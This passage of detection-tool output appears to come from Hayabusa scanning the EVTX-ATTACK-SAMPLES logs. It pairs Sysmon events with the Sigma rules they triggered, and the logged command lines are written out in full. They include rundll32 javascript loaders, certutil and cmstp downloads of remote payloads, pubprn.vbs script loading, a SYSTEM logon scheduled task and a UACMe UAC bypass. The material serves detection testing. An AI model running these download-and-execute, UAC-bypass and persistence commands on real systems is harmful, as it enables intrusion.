javascript:""\..\mshtml,RunHTMLApplication "";document.write();GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"") | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"") | LID: 0x413182 | PID: 348 | PGUID: 747F3D96-6652-5D3F-0000-001058828C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:10.708 +00:00,MSEDGEWIN10,1,high,Evas,Rundll32 JS RunHTMLApplication Pattern,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_rundll32_js_runhtmlapplication.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:10.708 +00:00,MSEDGEWIN10,1,medium,Evas,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:10.708 +00:00,MSEDGEWIN10,1,high,,Application Executed Non-Executable Extension,,rules/sigma/process_creation_sysmon/proc_creation_win_run_executable_invalid_extension.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:11.501 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"") | LID: 0x413182 | PID: 4888 | PGUID: 
747F3D96-6653-5D3F-0000-001083BC8C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:12.352 +00:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:49831 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\rundll32.exe | PID: 348 | PGUID: 747F3D96-6652-5D3F-0000-001058828C00,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:12.352 +00:00,MSEDGEWIN10,3,medium,Evas | Exec,Rundll32 Internet Connection,,rules/sigma/network_connection/net_connection_win_rundll32_net_connections.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:15.226 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new0ActiveXObject(""WScript.Shell"").run(""calc.exe"",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im rundll32.exe && exit"",0,true);} | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 1808 | PGUID: 747F3D96-6657-5D3F-0000-001029198D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:15.226 +00:00,MSEDGEWIN10,1,medium,Evas,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:15.252 
+00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 2296 | PGUID: 747F3D96-6657-5D3F-0000-0010D01A8D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:15.658 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new0ActiveXObject(""WScript.Shell"").run(""calc.exe"",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im rundll32.exe && exit"",0,true);} | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new0ActiveXObject(""WScript.Shell"").run(""calc.exe"",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im rundll32.exe && exit"",0,true);} | LID: 0x413182 | PID: 1004 | PGUID: 747F3D96-6657-5D3F-0000-001011298D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:15.658 +00:00,MSEDGEWIN10,1,medium,Evas,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:15.658 +00:00,MSEDGEWIN10,1,high,,Application Executed Non-Executable 
Extension,,rules/sigma/process_creation_sysmon/proc_creation_win_run_executable_invalid_extension.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:20.238 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 7088 | PGUID: 747F3D96-665C-5D3F-0000-0010096B8D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:20.238 +00:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:20.262 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 3076 | PGUID: 747F3D96-665C-5D3F-0000-0010DC6B8D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:20.459 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 | Process: C:\Windows\System32\certutil.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt 
Default_File_Path2.ps1 | LID: 0x413182 | PID: 4520 | PGUID: 747F3D96-665C-5D3F-0000-0010E37B8D00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:20.459 +00:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:21.867 +00:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49832 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\certutil.exe | PID: 4520 | PGUID: 747F3D96-665C-5D3F-0000-0010E37B8D00,rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:21.867 +00:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49833 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\certutil.exe | PID: 4520 | PGUID: 747F3D96-665C-5D3F-0000-0010E37B8D00,rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:25.202 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6428 | PGUID: 
747F3D96-6661-5D3F-0000-00107AB88D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:25.269 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5888 | PGUID: 747F3D96-6661-5D3F-0000-00103CBD8D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:25.659 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf | Process: C:\Windows\System32\cmstp.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf | LID: 0x413182 | PID: 6820 | PGUID: 747F3D96-6661-5D3F-0000-0010CBC88D00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:25.659 +00:00,MSEDGEWIN10,1,high,PrivEsc | Evas,Bypass UAC via CMSTP,,rules/sigma/process_creation_sysmon/proc_creation_win_uac_cmstp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:30.237 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 2244 | PGUID: 
747F3D96-6666-5D3F-0000-001016F78D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:30.258 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 4976 | PGUID: 747F3D96-6666-5D3F-0000-0010C6F88D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:30.685 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe | Process: C:\Windows\System32\forfiles.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe | LID: 0x413182 | PID: 1464 | PGUID: 747F3D96-6666-5D3F-0000-0010AE068E00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:30.807 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe | LID: 0x413182 | PID: 4336 | PGUID: 747F3D96-6666-5D3F-0000-0010DF098E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:30.807 +00:00,MSEDGEWIN10,1,low,Evas,Indirect Command Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_indirect_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:35.313 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c 
winrm qc -q | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5840 | PGUID: 747F3D96-666B-5D3F-0000-001051638E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:35.337 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine=""calc""} | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 1580 | PGUID: 747F3D96-666B-5D3F-0000-001033648E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:35.347 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6412 | PGUID: 747F3D96-666B-5D3F-0000-00107C668E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:35.838 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cscript //nologo ""C:\Windows\System32\winrm.vbs"" qc -q | Process: C:\Windows\System32\cscript.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c winrm qc -q | LID: 0x413182 | PID: 3224 | PGUID: 747F3D96-666B-5D3F-0000-00102F7F8E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:35.838 +00:00,MSEDGEWIN10,1,medium,Exec,Cscript Visual Basic Script 
Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:35.878 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cscript //nologo ""C:\Windows\System32\winrm.vbs"" i c wmicimv2/Win32_Process @{CommandLine=""calc""} | Process: C:\Windows\System32\cscript.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine=""calc""} | LID: 0x413182 | PID: 264 | PGUID: 747F3D96-666B-5D3F-0000-0010EF858E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:35.878 +00:00,MSEDGEWIN10,1,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:36.421 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Execution - Suspicious Microsoft.XMLDOM module load | Image: C:\Windows\System32\msxml3.dll | Process: C:\Windows\System32\cscript.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 3224 | PGUID: 747F3D96-666B-5D3F-0000-00102F7F8E00 | Hash: SHA1=23805C325D9D4F0A3467F6D2A402A259C376A7F0,MD5=D1B65A6CC7A53A0B68BEE51C639E8F01,SHA256=C948999A3823DA8EBA679F15ABAAEB5E057C91EB716A9DBF9F97FFD09E96CBF7,IMPHASH=2E1D1E35C17BE5497D2DE33F06DC41B4",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:36.534 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: calc | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x413182 | PID: 3872 | PGUID: 
747F3D96-666C-5D3F-0000-00104BB78E00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:36.534 +00:00,MSEDGEWIN10,1,high,Exec,Wmiprvse Spawning Process,,rules/sigma/process_creation_sysmon/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:36.548 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Execution - Suspicious Microsoft.XMLDOM module load | Image: C:\Windows\System32\msxml3.dll | Process: C:\Windows\System32\cscript.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 264 | PGUID: 747F3D96-666B-5D3F-0000-0010EF858E00 | Hash: SHA1=23805C325D9D4F0A3467F6D2A402A259C376A7F0,MD5=D1B65A6CC7A53A0B68BEE51C639E8F01,SHA256=C948999A3823DA8EBA679F15ABAAEB5E057C91EB716A9DBF9F97FFD09E96CBF7,IMPHASH=2E1D1E35C17BE5497D2DE33F06DC41B4",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:40.261 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c schtasks /create /tn ""mysc"" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru ""System"" /f | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 2916 | PGUID: 747F3D96-6670-5D3F-0000-001099048F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:40.261 +00:00,MSEDGEWIN10,1,high,Evas,Suspicious Calculator Usage,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_calc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 
21:34:40.385 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 4720 | PGUID: 747F3D96-6670-5D3F-0000-00105F098F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:40.889 +00:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence - Scheduled Task Management | Cmd: schtasks /create /tn ""mysc"" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru ""System"" /f | Process: C:\Windows\System32\schtasks.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c schtasks /create /tn ""mysc"" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru ""System"" /f | LID: 0x413182 | PID: 7076 | PGUID: 747F3D96-6670-5D3F-0000-0010F9148F00 | Hash: SHA1=112C8FFA1C0934ACAAD2C58B3C7E81F3FB8E4A2C,MD5=3F9FD6D3B3E96B8F576DB72035DB38A7,SHA256=D6BA2CD73799477C051D9D864C47FCF5108064CDE07D3565871AFA10FC548086,IMPHASH=7EE4BC5589713B3470B8A950256E2E69",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:40.889 +00:00,MSEDGEWIN10,1,high,Evas,Suspicious Calculator Usage,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_calc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:40.889 +00:00,MSEDGEWIN10,1,low,Exec | Persis | PrivEsc,Scheduled Task Creation,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:41.793 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\Tasks\mysc | Process: 
C:\Windows\system32\svchost.exe | PID: 1028 | PGUID: 747F3D96-DCFE-5D3F-0000-001044D20000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:45.242 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 4184 | PGUID: 747F3D96-6675-5D3F-0000-0010AA498F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:45.311 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6192 | PGUID: 747F3D96-6675-5D3F-0000-0010774E8F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:45.606 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct | Process: C:\Windows\System32\cscript.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct | LID: 0x413182 | PID: 4036 | PGUID: 
747F3D96-6675-5D3F-0000-0010875C8F00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:45.606 +00:00,MSEDGEWIN10,1,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-08-03 09:46:48.209 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 34 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 924 | PGUID: 747F3D96-5808-5D45-0000-00106CDC3E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx +2019-08-03 09:46:48.209 +00:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation_sysmon/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx +2019-08-03 09:46:48.209 +00:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx +2019-08-03 09:46:48.726 +00:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,"PrivEsc - UAC bypass UACME-34 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000\Environment\windir: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\explorer.exe | PID: 924 | PGUID: 